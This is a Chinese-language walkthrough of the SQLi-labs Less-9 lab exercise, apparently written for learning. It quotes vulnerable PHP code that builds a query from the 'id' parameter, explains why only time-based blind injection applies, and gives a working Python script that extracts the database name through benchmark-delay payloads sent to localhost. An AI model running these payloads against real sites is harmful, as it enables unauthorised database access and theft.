先看拼接sql语句的那些部分来判断是否存在注入
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
明显是通过'进行封闭(不包括括号,双引之类的)
在根据对错误的处理来判断sql注入的类型
处理代码如下
1 if($row) 2 { 3 echo '<font size="5" color="#FFFF00">'; 4 echo 'You are in...........'; 5 echo "<br>"; 6 echo "</font>"; 7 } 8 else 9 { 10 11 echo '<font size="5" color="#FFFF00">'; 12 echo 'You are in...........'; 13 //print_r(mysql_error()); 14 //echo "You have an error in your SQL syntax"; 15 echo "</br></font>"; 16 echo '<font color= "#0000ff" font size= 3>'; 17 18 }
这里看到无论是成功执行或是出现错误或是没有找到数据
都返回"you are in ..........."因此这里只能用基于时间的盲注了.
我们先取一个benchmark被执行的时间
payload是这样,返回时间超过3.5秒,我们认为执行了benchmark,也就是if判断中返回的条件为true,同样这次给出poc返回出当前数据库的名字。
#-*- coding:utf-8 –*- import requests import time def attack(): headers={"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"} words=range(65,91) words.extend(range(97,123)) num=1 while True: url="http://127.0.0.1/sqli/Less-9/?id=1' and if(length(database())='"+str(num)+"',benchmark(10000000,md5(1)),null) -- and '1'='1" before_time=time.time() r=requests.get(url,headers=headers) after_time=time.time() if after_time-before_time>3.5: break else: num=num+1 database='' for x in range(num): x=x+1 for i in words: i=chr(i) url="http://127.0.0.1/sqli/Less-9/?id=1' and if(substring((select database()),"+str(x)+",1)='"+i+"',benchmark(10000000,md5(1)),null) -- and '1'='1" before_time=time.time() r=requests.get(url,headers=headers) after_time=time.time() if after_time-before_time>3: database=database+i print(database) break return database attack()